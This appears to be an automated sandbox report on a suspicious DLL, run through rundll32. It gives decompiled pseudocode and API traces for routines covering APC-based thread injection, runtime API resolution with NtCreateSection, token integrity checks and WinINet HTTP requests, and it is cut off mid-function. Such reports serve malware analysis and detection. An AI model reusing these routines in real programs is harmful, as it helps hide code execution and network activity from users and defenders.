                					_t10 = InterlockedDecrement(0x404188);
                					__eflags = _t10;
                					if(_t10 == 0) {
                						__eflags =  *0x40418c;
                						if( *0x40418c != 0) {
                							_t36 = 0x2328;
                							while(1) {
                								SleepEx(0x64, 1);
                								__eflags =  *0x404198;
                								if( *0x404198 == 0) {
                									break;
                								}
                								_t36 = _t36 - 0x64;
                								__eflags = _t36;
                								if(_t36 > 0) {
                									continue;
                								}
                								break;
                							}
                							CloseHandle( *0x40418c);
                						}
                						HeapDestroy( *0x404190);
                					}
                				} else {
                					if(_t9 == 1 && InterlockedIncrement(0x404188) == 1) {
                						_t18 = HeapCreate(0, 0x400000, 0); // executed
                						 *0x404190 = _t18;
                						_t41 = _t18;
                						if(_t18 == 0) {
                							L6:
                							_v8 = 0;
                						} else {
                							 *0x4041b0 = _a4;
                							asm("lock xadd [eax], edi");
                							_push( &_a8);
                							_t23 = E00401234(E00401108, E00401A4E(_a12, 1, 0x404198, _t41));
                							 *0x40418c = _t23;
                							if(_t23 == 0) {
                								asm("lock xadd [esi], eax");
                								goto L6;
                							}
                						}
                					}
                				}
                				return _v8;
                			}

                APIs
                • InterlockedIncrement.KERNEL32(00404188), ref: 00401048
                • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 0040105D
                  • Part of subcall function 00401234: CreateThread.KERNEL32 ref: 0040124B
                  • Part of subcall function 00401234: QueueUserAPC.KERNEL32(?,00000000,?), ref: 00401260
                  • Part of subcall function 00401234: GetLastError.KERNEL32(00000000), ref: 0040126B
                  • Part of subcall function 00401234: TerminateThread.KERNEL32(00000000,00000000), ref: 00401275
                  • Part of subcall function 00401234: CloseHandle.KERNEL32(00000000), ref: 0040127C
                  • Part of subcall function 00401234: SetLastError.KERNEL32(00000000), ref: 00401285
                • InterlockedDecrement.KERNEL32(00404188), ref: 004010B0
                • SleepEx.KERNEL32(00000064,00000001), ref: 004010CA
                • CloseHandle.KERNEL32 ref: 004010E6
                • HeapDestroy.KERNEL32 ref: 004010F2
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.772858037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000002.772848945.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772865794.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772877043.0000000000405000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772888672.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                Similarity
                • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                • String ID: Tet
                • API String ID: 2110400756-252227037
                • Opcode ID: 669a5a5f85ff216ecb959dfe8c96872353a21141545acfd4606ed105fff93c3f
                • Instruction ID: 9d4a17a678d08970cf57b2f1e36a9458cc50fc0a5258caeb14e27803114ead1f
                • Opcode Fuzzy Hash: 669a5a5f85ff216ecb959dfe8c96872353a21141545acfd4606ed105fff93c3f
                • Instruction Fuzzy Hash: A821DBB1601245EFC7109FA9DD8995A3BACF795361710803FF645F76E0D6388D808B5C
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                control_flow_graph 331 401234-401255 CreateThread 332 401257-401268 QueueUserAPC 331->332 333 40128c-40128f 331->333 332->333 334 40126a-40128b TerminateThread CloseHandle SetLastError 332->334 334->333
                C-Code - Quality: 100%
                			E00401234(long _a4, DWORD* _a12) {
                				_Unknown_base(*)()* _v0;
                				void* _t4;
                				long _t6;
                				long _t11;
                				void* _t13;
                
                				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x4041c0, 0, _a12); // executed
                				_t13 = _t4;
                				if(_t13 != 0) {
                					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
                					if(_t6 == 0) {
                						_t11 = GetLastError();
                						TerminateThread(_t13, _t11);
                						CloseHandle(_t13);
                						_t13 = 0;
                						SetLastError(_t11);
                					}
                				}
                				return _t13;
                			}

                APIs
                • CreateThread.KERNEL32 ref: 0040124B
                • QueueUserAPC.KERNEL32(?,00000000,?), ref: 00401260
                • GetLastError.KERNEL32(00000000), ref: 0040126B
                • TerminateThread.KERNEL32(00000000,00000000), ref: 00401275
                • CloseHandle.KERNEL32(00000000), ref: 0040127C
                • SetLastError.KERNEL32(00000000), ref: 00401285
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.772858037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000002.772848945.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772865794.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772877043.0000000000405000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772888672.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                Similarity
                • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                • String ID: @Met`fet MetTet
                • API String ID: 3832013932-3757152079
                • Opcode ID: bf9b07cd72ddc2e2615db3486535b2b5d0ca531616998ebd93f4fd021cca7c02
                • Instruction ID: 1354c8c38f80fb1a657a7f50ca056ce192f000d7ace579d051b64714a3abc9de
                • Opcode Fuzzy Hash: bf9b07cd72ddc2e2615db3486535b2b5d0ca531616998ebd93f4fd021cca7c02
                • Instruction Fuzzy Hash: 90F01236506621FBD7115FA1AD08F5FBF6DFB08752F004529FA01F5174C7358A108BA9
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 93%
                			E04B92062(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
                				void* _t17;
                				void* _t18;
                				void* _t19;
                				void* _t20;
                				void* _t21;
                				intOrPtr _t24;
                				void* _t37;
                				void* _t41;
                				intOrPtr* _t45;
                
                				_t41 = __edi;
                				_t37 = __ebx;
                				_t45 = __eax;
                				_t16 =  *((intOrPtr*)(__eax + 0x20));
                				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
                					E04B9705E(_t16, __ecx, 0xea60);
                				}
                				_t17 =  *(_t45 + 0x18);
                				_push(_t37);
                				_push(_t41);
                				if(_t17 != 0) {
                					InternetSetStatusCallback(_t17, 0);
                					InternetCloseHandle( *(_t45 + 0x18)); // executed
                				}
                				_t18 =  *(_t45 + 0x14);
                				if(_t18 != 0) {
                					InternetSetStatusCallback(_t18, 0);
                					InternetCloseHandle( *(_t45 + 0x14));
                				}
                				_t19 =  *(_t45 + 0x10);
                				if(_t19 != 0) {
                					InternetSetStatusCallback(_t19, 0);
                					InternetCloseHandle( *(_t45 + 0x10));
                				}
                				_t20 =  *(_t45 + 0x1c);
                				if(_t20 != 0) {
                					CloseHandle(_t20);
                				}
                				_t21 =  *(_t45 + 0x20);
                				if(_t21 != 0) {
                					CloseHandle(_t21);
                				}
                				_t22 =  *((intOrPtr*)(_t45 + 8));
                				if( *((intOrPtr*)(_t45 + 8)) != 0) {
                					E04B94130(_t22);
                					 *((intOrPtr*)(_t45 + 8)) = 0;
                					 *((intOrPtr*)(_t45 + 0x30)) = 0;
                				}
                				_t23 =  *((intOrPtr*)(_t45 + 0xc));
                				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
                					E04B94130(_t23);
                				}
                				_t24 =  *_t45;
                				if(_t24 != 0) {
                					_t24 = E04B94130(_t24);
                				}
                				_t46 =  *((intOrPtr*)(_t45 + 4));
                				if( *((intOrPtr*)(_t45 + 4)) != 0) {
                					return E04B94130(_t46);
                				}
                				return _t24;
                			}

                APIs
                • InternetSetStatusCallback.WININET(?,00000000), ref: 04B92090
                • InternetCloseHandle.WININET(?), ref: 04B92095
                • InternetSetStatusCallback.WININET(?,00000000), ref: 04B920A0
                • InternetCloseHandle.WININET(?), ref: 04B920A5
                • InternetSetStatusCallback.WININET(?,00000000), ref: 04B920B0
                • InternetCloseHandle.WININET(?), ref: 04B920B5
                • CloseHandle.KERNEL32(?,00000000,00000102,?,?,04B94741,?,?,746981D0,00000000,00000000), ref: 04B920C5
                • CloseHandle.KERNEL32(?,00000000,00000102,?,?,04B94741,?,?,746981D0,00000000,00000000), ref: 04B920CF
                  • Part of subcall function 04B9705E: WaitForMultipleObjects.KERNEL32(00000002,04B97CEC,00000000,04B97CEC,?,?,?,04B97CEC,0000EA60), ref: 04B97079
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: Internet$CloseHandle$CallbackStatus$MultipleObjectsWait
                • String ID:
                • API String ID: 2824497044-0
                • Opcode ID: c32a9dcc3dc6f3e9a856e1664d9cc08e946e8bd038261437724b39d0d7d968e8
                • Instruction ID: b3ecd1b29b5470112b8c08966dac056003821b0b9363026afe38df539f599136
                • Opcode Fuzzy Hash: c32a9dcc3dc6f3e9a856e1664d9cc08e946e8bd038261437724b39d0d7d968e8
                • Instruction Fuzzy Hash: 0311EC76A006587BCA34AFBAEC84C5BBBEDEF453143550DA9E085D3520CB35FC958A60
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 100%
                			E04B95976(long* _a4) {
                				long _v8;
                				void* _v12;
                				void _v16;
                				long _v20;
                				int _t33;
                				void* _t46;
                
                				_v16 = 1;
                				_v20 = 0x2000;
                				if( *0x4b9a2fc > 5) {
                					_v16 = 0;
                					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                						_v8 = 0;
                						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                						if(_v8 != 0) {
                							_t46 = E04B96601(_v8);
                							if(_t46 != 0) {
                								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                								if(_t33 != 0) {
                									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                								}
                								E04B94130(_t46);
                							}
                						}
                						CloseHandle(_v12);
                					}
                				}
                				 *_a4 = _v20;
                				return _v16;
                			}

                APIs
                • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 04B959A8
                • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 04B959C8
                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04B959D8
                • CloseHandle.KERNEL32(00000000), ref: 04B95A28
                  • Part of subcall function 04B96601: RtlAllocateHeap.NTDLL(00000000,00000000,04B964FD), ref: 04B9660D
                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 04B959FB
                • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 04B95A03
                • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 04B95A13
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                • String ID:
                • API String ID: 1295030180-0
                • Opcode ID: dce305b98602624abbf47764ce9769091c88518d6cfadec302a352f94d3fe8bc
                • Instruction ID: beb21443cb4d8cacf9f39a19520fbeb5a25267e847beba085327b63a93fe1a89
                • Opcode Fuzzy Hash: dce305b98602624abbf47764ce9769091c88518d6cfadec302a352f94d3fe8bc
                • Instruction Fuzzy Hash: 6421487590025DBFEF119FA0DD84EEEBBB9EB08304F1000A6E910A62A0CB755E55DB60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 64%
                			E04B95D8A(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                				intOrPtr _v8;
                				intOrPtr _t9;
                				intOrPtr _t13;
                				char* _t19;
                				char* _t28;
                				void* _t33;
                				void* _t34;
                				char* _t36;
                				void* _t38;
                				intOrPtr* _t39;
                				char* _t40;
                				char* _t42;
                				char* _t43;
                
                				_t34 = __edx;
                				_push(__ecx);
                				_t9 =  *0x4b9a348; // 0x56d5a8
                				_t1 = _t9 + 0x4b9b624; // 0x253d7325
                				_t36 = 0;
                				_t28 = E04B94A01(__ecx, _t1);
                				if(_t28 != 0) {
                					_t39 = __imp__;
                					_t13 =  *_t39(_t28, _t38);
                					_v8 = _t13;
                					_t6 =  *_t39(_a4) + 1; // 0x5109601
                					_t40 = E04B96601(_v8 + _t6);
                					if(_t40 != 0) {
                						strcpy(_t40, _t28);
                						_pop(_t33);
                						__imp__(_t40, _a4);
                						_t19 = E04B95310(_t33, _t34, _t40, _a8); // executed
                						_t36 = _t19;
                						E04B94130(_t40);
                						_t42 = E04B9272B(StrTrimA(_t36, "="), _t36);
                						if(_t42 != 0) {
                							E04B94130(_t36);
                							_t36 = _t42;
                						}
                						_t43 = E04B92273(_t36, _t33);
                						if(_t43 != 0) {
                							E04B94130(_t36);
                							_t36 = _t43;
                						}
                					}
                					E04B94130(_t28);
                				}
                				return _t36;
                			}

                APIs
                  • Part of subcall function 04B94A01: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04B95DA3,253D7325,00000000,00000000,?,76B5C740,04B96DDD), ref: 04B94A68
                  • Part of subcall function 04B94A01: sprintf.NTDLL ref: 04B94A89
                • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,76B5C740,04B96DDD,00000000,05109600), ref: 04B95DB5
                • lstrlen.KERNEL32(00000000,?,76B5C740,04B96DDD,00000000,05109600), ref: 04B95DBD
                  • Part of subcall function 04B96601: RtlAllocateHeap.NTDLL(00000000,00000000,04B964FD), ref: 04B9660D
                • strcpy.NTDLL ref: 04B95DD4
                • lstrcat.KERNEL32(00000000,00000000), ref: 04B95DDF
                  • Part of subcall function 04B95310: lstrlen.KERNEL32(00000000,00000000,04B96DDD,00000000,?,04B95DEE,00000000,04B96DDD,?,76B5C740,04B96DDD,00000000,05109600), ref: 04B95321
                  • Part of subcall function 04B94130: RtlFreeHeap.NTDLL(00000000,00000000,04B9658A,00000000,?,00000000,00000000), ref: 04B9413C
                • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,04B96DDD,?,76B5C740,04B96DDD,00000000,05109600), ref: 04B95DFC
                  • Part of subcall function 04B9272B: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,04B95E08,00000000,?,76B5C740,04B96DDD,00000000,05109600), ref: 04B92735
                  • Part of subcall function 04B9272B: _snprintf.NTDLL ref: 04B92793
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                • String ID: =
                • API String ID: 2864389247-1428090586
                • Opcode ID: 95fb52e9a080b6b675d8a8586efb40b815d45d4cdbc9e025bfeb3436b0998b09
                • Instruction ID: 5a131ff33c400e9a4f292e9a139d13a10594aeb7c243bedafb4ff4b06e0ab893
                • Opcode Fuzzy Hash: 95fb52e9a080b6b675d8a8586efb40b815d45d4cdbc9e025bfeb3436b0998b09
                • Instruction Fuzzy Hash: B2119133905535775E2277B4AC44CAF3ADDDE4965870544B6F500A7200DE79FD0247A4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00401AA8(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                				intOrPtr _v8;
                				_Unknown_base(*)()* _t29;
                				_Unknown_base(*)()* _t33;
                				_Unknown_base(*)()* _t36;
                				_Unknown_base(*)()* _t39;
                				_Unknown_base(*)()* _t42;
                				intOrPtr _t46;
                				struct HINSTANCE__* _t50;
                				intOrPtr _t56;
                
                				_t56 = E00401634(0x20);
                				if(_t56 == 0) {
                					_v8 = 8;
                				} else {
                					_t50 = GetModuleHandleA( *0x4041c4 + 0x405014);
                					_v8 = 0x7f;
                					_t29 = GetProcAddress(_t50,  *0x4041c4 + 0x405151);
                					 *(_t56 + 0xc) = _t29;
                					if(_t29 == 0) {
                						L8:
                						E00401B8C(_t56);
                					} else {
                						_t33 = GetProcAddress(_t50,  *0x4041c4 + 0x405161);
                						 *(_t56 + 0x10) = _t33;
                						if(_t33 == 0) {
                							goto L8;
                						} else {
                							_t36 = GetProcAddress(_t50,  *0x4041c4 + 0x405174);
                							 *(_t56 + 0x14) = _t36;
                							if(_t36 == 0) {
                								goto L8;
                							} else {
                								_t39 = GetProcAddress(_t50,  *0x4041c4 + 0x405189);
                								 *(_t56 + 0x18) = _t39;
                								if(_t39 == 0) {
                									goto L8;
                								} else {
                									_t42 = GetProcAddress(_t50,  *0x4041c4 + 0x40519f);
                									 *(_t56 + 0x1c) = _t42;
                									if(_t42 == 0) {
                										goto L8;
                									} else {
                										 *((intOrPtr*)(_t56 + 8)) = _a8;
                										 *((intOrPtr*)(_t56 + 4)) = _a4;
                										_t46 = E0040154A(_t56, _a12); // executed
                										_v8 = _t46;
                										if(_t46 != 0) {
                											goto L8;
                										} else {
                											 *_a16 = _t56;
                										}
                									}
                								}
                							}
                						}
                					}
                				}
                				return _v8;
                			}

                APIs
                  • Part of subcall function 00401634: RtlAllocateHeap.NTDLL(00000000,?,00401C48,00000030,746563F0,00000000), ref: 00401640
                • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401961,?,?,?,?,?,00000002,?,?), ref: 00401ACC
                • GetProcAddress.KERNEL32(00000000,?), ref: 00401AEE
                • GetProcAddress.KERNEL32(00000000,?), ref: 00401B04
                • GetProcAddress.KERNEL32(00000000,?), ref: 00401B1A
                • GetProcAddress.KERNEL32(00000000,?), ref: 00401B30
                • GetProcAddress.KERNEL32(00000000,?), ref: 00401B46
                  • Part of subcall function 0040154A: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74654EE0,00000000,00000000,?), ref: 004015A7
                  • Part of subcall function 0040154A: memset.NTDLL ref: 004015C9
                Memory Dump Source
                • Source File: 00000003.00000002.772858037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000002.772848945.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772865794.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772877043.0000000000405000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772888672.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                Similarity
                • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                • String ID:
                • API String ID: 3012371009-0
                • Opcode ID: d98a950e50a03993abc413ac9c6a8d83a4e28b3843b188da81eabab51976a571
                • Instruction ID: 104c0fa8a799cd8d8f99161a68f82bfdf39da6e094ed46ae4b7535b7f7f06d6b
                • Opcode Fuzzy Hash: d98a950e50a03993abc413ac9c6a8d83a4e28b3843b188da81eabab51976a571
                • Instruction Fuzzy Hash: B12127B0A0460AAFD710DF69CD84E6BB7FCEB4434470044B6E909EB2B1E774E9058B68
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E04B963F7(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                				void* __esi;
                				long _t10;
                				void* _t18;
                				void* _t22;
                
                				_t9 = __eax;
                				_t22 = __eax;
                				if(_a4 != 0 && E04B95448(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
                					L9:
                					return GetLastError();
                				}
                				_t10 = E04B97C28(_t9, _t18, _t22, _a8); // executed
                				if(_t10 == 0) {
                					ResetEvent( *(_t22 + 0x1c));
                					ResetEvent( *(_t22 + 0x20));
                					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
                						SetEvent( *(_t22 + 0x1c));
                						goto L7;
                					} else {
                						_t10 = GetLastError();
                						if(_t10 == 0x3e5) {
                							L7:
                							_t10 = 0;
                						}
                					}
                				}
                				if(_t10 == 0xffffffff) {
                					goto L9;
                				}
                				return _t10;
                			}

                APIs
                • ResetEvent.KERNEL32(?,00000008,?,?,00000102,04B946E0,?,?,746981D0,00000000), ref: 04B96431
                • ResetEvent.KERNEL32(?), ref: 04B96436
                • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 04B96443
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,04B96E43,00000000,?,?), ref: 04B9644E
                • GetLastError.KERNEL32(?,?,00000102,04B946E0,?,?,746981D0,00000000), ref: 04B96469
                  • Part of subcall function 04B95448: lstrlen.KERNEL32(00000000,00000008,?,74654D40,?,?,04B96416,?,?,?,?,00000102,04B946E0,?,?,746981D0), ref: 04B95454
                  • Part of subcall function 04B95448: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04B96416,?,?,?,?,00000102,04B946E0,?), ref: 04B954B2
                  • Part of subcall function 04B95448: lstrcpy.KERNEL32(00000000,00000000), ref: 04B954C2
                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,04B96E43,00000000,?), ref: 04B9645C
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
                • String ID:
                • API String ID: 3739416942-0
                • Opcode ID: a9953e2a55e316956eaf4fb7627cc3555fe93cbb86ab185a488254f5be6e0745
                • Instruction ID: f3a0224d2fe4c3a4744a309d99b34f64aec87065dbb2d4a361d0a0ec9eadd36b
                • Opcode Fuzzy Hash: a9953e2a55e316956eaf4fb7627cc3555fe93cbb86ab185a488254f5be6e0745
                • Instruction Fuzzy Hash: C101AD31100201AADF316FB9DD44F1B77E8FF54325F108A7AF461922E0DA20FC10DA61
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 50%
                			E04B97838(void** __esi) {
                				intOrPtr _v0;
                				intOrPtr _t4;
                				intOrPtr _t6;
                				void* _t8;
                				void* _t9;
                				intOrPtr _t10;
                				void* _t11;
                				void** _t13;
                
                				_t13 = __esi;
                				_t4 =  *0x4b9a3cc; // 0x5109600
                				__imp__(_t4 + 0x40);
                				while(1) {
                					_t6 =  *0x4b9a3cc; // 0x5109600
                					_t1 = _t6 + 0x58; // 0x0
                					if( *_t1 == 0) {
                						break;
                					}
                					Sleep(0xa);
                				}
                				_t8 =  *_t13;
                				if(_t8 != 0 && _t8 != 0x4b9a030) {
                					HeapFree( *0x4b9a2d8, 0, _t8);
                				}
                				_t9 = E04B91653(_v0, _t13); // executed
                				_t13[1] = _t9;
                				_t10 =  *0x4b9a3cc; // 0x5109600
                				_t11 = _t10 + 0x40;
                				__imp__(_t11);
                				return _t11;
                			}

                APIs
                • RtlEnterCriticalSection.NTDLL(051095C0), ref: 04B97841
                • Sleep.KERNEL32(0000000A), ref: 04B9784B
                • HeapFree.KERNEL32(00000000,00000000), ref: 04B97873
                • RtlLeaveCriticalSection.NTDLL(051095C0), ref: 04B9788F
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                • String ID: Uet
                • API String ID: 58946197-2766386878
                • Opcode ID: 1331a79665f9246b04d60d20c2ee2881f096f7dddc1d7c874e1072ab5c3e2d2a
                • Instruction ID: 7138d2e852ac970e55947d15a0b3e9b4b935a343d59d876e84f91d08b81252fe
                • Opcode Fuzzy Hash: 1331a79665f9246b04d60d20c2ee2881f096f7dddc1d7c874e1072ab5c3e2d2a
                • Instruction Fuzzy Hash: A3F0FE71604282EBEF209F7ADE88B163BF4EB08740B04846AF916D7261CE35EC50DB35
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 59%
                			E04B9349A(signed int __edx) {
                				signed int _v8;
                				long _v12;
                				CHAR* _v16;
                				long _v20;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* _t21;
                				CHAR* _t22;
                				CHAR* _t25;
                				intOrPtr _t26;
                				void* _t27;
                				void* _t31;
                				intOrPtr _t32;
                				void* _t33;
                				CHAR* _t37;
                				CHAR* _t43;
                				CHAR* _t44;
                				CHAR* _t45;
                				void* _t50;
                				void* _t52;
                				signed char _t57;
                				intOrPtr _t59;
                				signed int _t60;
                				void* _t64;
                				CHAR* _t68;
                				CHAR* _t69;
                				char* _t70;
                				void* _t71;
                
                				_t62 = __edx;
                				_v20 = 0;
                				_v8 = 0;
                				_v12 = 0;
                				_t21 = E04B973F3();
                				if(_t21 != 0) {
                					_t60 =  *0x4b9a2fc; // 0x4000000a: the low byte (0x0a) is compared against 5 and 6 and formatted into the user-agent string below, i.e. it carries the OS major version; the high nibble is preserved here
                					_t56 = (_t60 & 0xf0000000) + _t21;
                					 *0x4b9a2fc = (_t60 & 0xf0000000) + _t21;
                				}
                				_t22 =  *0x4b9a178(0, 2); // executed
                				_v16 = _t22;
                				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) { // S_OK, S_FALSE or RPC_E_CHANGED_MODE (0x80010106): the (0, 2) call and these return codes match CoInitializeEx(NULL, COINIT_APARTMENTTHREADED)
                					_t25 = E04B96B51( &_v8,  &_v20); // executed
                					_t55 = _t25;
                					_t26 =  *0x4b9a348; // 0x56d5a8
                					if( *0x4b9a2fc > 5) {
                						_t8 = _t26 + 0x4b9b5c5; // 0x4d283a53: bytes spell "S:(M", an SDDL string with a mandatory-integrity label, selected when the version byte is > 5 (Vista and later)
                						_t27 = _t8;
                					} else {
                						_t7 = _t26 + 0x4b9b9ef; // 0x44283a44: bytes spell "D:(D", a DACL-only SDDL string for pre-Vista systems
                						_t27 = _t7;
                					}
                					E04B9230B(_t27, _t27);
                					_t31 = E04B94B7B(_t62,  &_v20,  &_v12); // executed
                					if(_t31 == 0) {
                						CloseHandle(_v20);
                					}
                					_t64 = 5;
                					if(_t55 != _t64) {
                						_t32 = E04B93832();
                						 *0x4b9a310 =  *0x4b9a310 ^ 0x81bbe65d;
                						 *0x4b9a36c = _t32;
                						_t33 = E04B96601(0x60);
                						 *0x4b9a3cc = _t33;
                						__eflags = _t33;
                						if(_t33 == 0) {
                							_push(8);
                							_pop(0); // decompiler rendering of push 8 / pop into the return register: status 8 = ERROR_NOT_ENOUGH_MEMORY for the failed allocation
                						} else {
                							memset(_t33, 0, 0x60);
                							_t50 =  *0x4b9a3cc; // 0x5109600
                							_t71 = _t71 + 0xc;
                							__imp__(_t50 + 0x40);
                							_t52 =  *0x4b9a3cc; // 0x5109600
                							 *_t52 = 0x4b9b827;
                						}
                						_t55 = 0;
                						__eflags = 0;
                						if(0 == 0) {
                							_t37 = RtlAllocateHeap( *0x4b9a2d8, 0, 0x43);
                							 *0x4b9a368 = _t37;
